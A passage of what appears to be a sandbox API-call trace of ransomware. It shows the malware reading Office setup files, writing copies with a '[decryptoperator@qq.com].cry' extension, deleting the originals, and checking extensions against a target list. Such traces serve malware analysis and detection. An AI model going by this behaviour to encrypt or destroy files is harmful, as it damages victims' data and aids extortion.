Controller\\Office.en-us\\PSS10R.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.263] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.263] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.263] GetLastError () returned 0x0 [0040.263] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x6a3b, lpOverlapped=0x0) returned 1 [0040.276] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x6a40, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x6a40, lpOverlapped=0x0) returned 1 [0040.277] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.277] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0040.277] SetEndOfFile (hFile=0x1c4) returned 1 [0040.277] CloseHandle (hObject=0x1c4) returned 1 [0040.278] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.278] SetEndOfFile (hFile=0x1b8) returned 1 [0040.279] CloseHandle (hObject=0x1b8) returned 1 [0040.279] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.279] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm")) returned 1 [0040.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.280] lstrlenW (lpString=".doc") returned 4 [0040.280] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.280] lstrlenW (lpString=".docx") returned 5 [0040.280] lstrcmpiW (lpString1=".docx", lpString2="R.CHM") returned -1 [0040.280] lstrlenW (lpString=".pdf") returned 4 [0040.280] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.280] lstrlenW (lpString=".xls") returned 4 [0040.280] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.280] lstrlenW (lpString=".xlsx") returned 5 [0040.280] lstrcmpiW (lpString1=".xlsx", lpString2="R.CHM") returned -1 [0040.280] lstrlenW (lpString=".ppt") returned 4 [0040.280] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.280] lstrlenW (lpString=".zip") returned 4 [0040.280] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.280] lstrlenW (lpString=".rar") returned 4 [0040.280] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.280] lstrlenW (lpString=".bz2") returned 4 [0040.280] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.280] lstrlenW (lpString=".7z") returned 3 [0040.280] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.280] lstrlenW (lpString=".dbf") returned 4 [0040.280] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.280] lstrlenW (lpString=".1cd") returned 4 [0040.281] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.281] lstrlenW (lpString=".jpg") returned 4 [0040.281] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.281] lstrlenW (lpString=".doc") returned 4 [0040.281] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.281] lstrlenW (lpString=".docx") returned 5 [0040.281] lstrcmpiW (lpString1=".docx", lpString2="R.CHM") returned -1 [0040.281] lstrlenW (lpString=".pdf") returned 4 [0040.281] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.281] lstrlenW (lpString=".xls") returned 4 [0040.281] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.281] lstrlenW (lpString=".xlsx") returned 5 [0040.281] lstrcmpiW (lpString1=".xlsx", lpString2="R.CHM") returned -1 [0040.281] lstrlenW (lpString=".ppt") returned 4 [0040.281] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.281] lstrlenW (lpString=".zip") returned 4 [0040.281] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.281] lstrlenW (lpString=".rar") returned 4 [0040.281] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.281] lstrlenW (lpString=".bz2") returned 4 [0040.281] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.281] lstrlenW (lpString=".7z") returned 3 [0040.281] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.281] lstrlenW (lpString=".dbf") returned 4 [0040.281] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.281] lstrlenW (lpString=".1cd") returned 4 [0040.281] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.281] lstrlenW (lpString=".jpg") returned 4 [0040.281] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.282] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.282] lstrlenW (lpString="SETUP.XML") returned 9 [0040.282] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.282] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=9352) returned 1 [0040.282] CloseHandle (hObject=0x1b8) returned 1 [0040.282] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml")) returned 0x20 [0040.282] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.282] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.282] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.282] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.282] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.283] GetLastError () returned 0x0 [0040.283] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x2488, lpOverlapped=0x0) returned 1 [0040.294] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x2490, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x2490, lpOverlapped=0x0) returned 1 [0040.295] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.295] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.295] SetEndOfFile (hFile=0x1c4) returned 1 [0040.295] CloseHandle (hObject=0x1c4) returned 1 [0040.296] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.296] SetEndOfFile (hFile=0x1b8) returned 1 [0040.297] CloseHandle (hObject=0x1b8) returned 1 [0040.297] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.297] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml")) returned 1 [0040.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.297] lstrlenW (lpString=".doc") returned 4 [0040.297] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.297] lstrlenW (lpString=".docx") returned 5 [0040.297] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.297] lstrlenW (lpString=".pdf") returned 4 [0040.297] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.297] lstrlenW (lpString=".xls") returned 4 [0040.297] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.297] lstrlenW (lpString=".xlsx") returned 5 [0040.297] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.297] lstrlenW (lpString=".ppt") returned 4 [0040.297] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.297] lstrlenW (lpString=".zip") returned 4 [0040.297] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.297] lstrlenW (lpString=".rar") returned 4 [0040.297] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString=".bz2") returned 4 [0040.298] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString=".7z") returned 3 [0040.298] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.298] lstrlenW (lpString=".dbf") returned 4 [0040.298] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.298] lstrlenW (lpString=".1cd") returned 4 [0040.298] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.298] lstrlenW (lpString=".jpg") returned 4 [0040.298] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.298] lstrlenW (lpString=".doc") returned 4 [0040.298] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString=".docx") returned 5 [0040.298] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.298] lstrlenW (lpString=".pdf") returned 4 [0040.298] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString=".xls") returned 4 [0040.298] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString=".xlsx") returned 5 [0040.298] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.298] lstrlenW (lpString=".ppt") returned 4 [0040.298] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.298] lstrlenW (lpString=".zip") returned 4 [0040.298] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.298] lstrlenW (lpString=".rar") returned 4 [0040.298] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString=".bz2") returned 4 [0040.298] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString=".7z") returned 3 [0040.298] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.299] lstrlenW (lpString=".dbf") returned 4 [0040.299] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.299] lstrlenW (lpString=".1cd") returned 4 [0040.299] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0040.299] lstrlenW (lpString=".jpg") returned 4 [0040.299] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.299] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.299] lstrlenW (lpString="Office32MUI.XML") returned 15 [0040.299] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.300] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=1383) returned 1 [0040.300] CloseHandle (hObject=0x1b8) returned 1 [0040.300] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml")) returned 0x20 [0040.300] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.300] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.300] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.300] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.300] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.312] GetLastError () returned 0x0 [0040.312] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x567, lpOverlapped=0x0) returned 1 [0040.327] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x570, lpOverlapped=0x0) returned 1 [0040.328] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.328] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0040.328] SetEndOfFile (hFile=0x1c4) returned 1 [0040.328] CloseHandle (hObject=0x1c4) returned 1 [0040.329] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.329] SetEndOfFile (hFile=0x1b8) returned 1 [0040.329] CloseHandle (hObject=0x1b8) returned 1 [0040.329] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.330] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml")) returned 1 [0040.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.330] lstrlenW (lpString=".doc") returned 4 [0040.330] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.330] lstrlenW (lpString=".docx") returned 5 [0040.330] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.330] lstrlenW (lpString=".pdf") returned 4 [0040.330] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.330] lstrlenW (lpString=".xls") returned 4 [0040.330] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.330] lstrlenW (lpString=".xlsx") returned 5 [0040.330] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.330] lstrlenW (lpString=".ppt") returned 4 [0040.330] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.330] lstrlenW (lpString=".zip") returned 4 [0040.330] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.330] lstrlenW (lpString=".rar") returned 4 [0040.330] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.330] lstrlenW (lpString=".bz2") returned 4 [0040.330] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.330] lstrlenW (lpString=".7z") returned 3 [0040.330] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.330] lstrlenW (lpString=".dbf") returned 4 [0040.330] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.330] lstrlenW (lpString=".1cd") returned 4 [0040.330] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.331] lstrlenW (lpString=".jpg") returned 4 [0040.331] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.331] lstrlenW (lpString=".doc") returned 4 [0040.331] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.331] lstrlenW (lpString=".docx") returned 5 [0040.331] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.331] lstrlenW (lpString=".pdf") returned 4 [0040.331] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.331] lstrlenW (lpString=".xls") returned 4 [0040.331] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.331] lstrlenW (lpString=".xlsx") returned 5 [0040.331] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.331] lstrlenW (lpString=".ppt") returned 4 [0040.331] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.331] lstrlenW (lpString=".zip") returned 4 [0040.331] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.331] lstrlenW (lpString=".rar") returned 4 [0040.331] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.331] lstrlenW (lpString=".bz2") returned 4 [0040.331] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.331] lstrlenW (lpString=".7z") returned 3 [0040.331] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.331] lstrlenW (lpString=".dbf") returned 4 [0040.331] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.331] lstrlenW (lpString=".1cd") returned 4 [0040.331] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 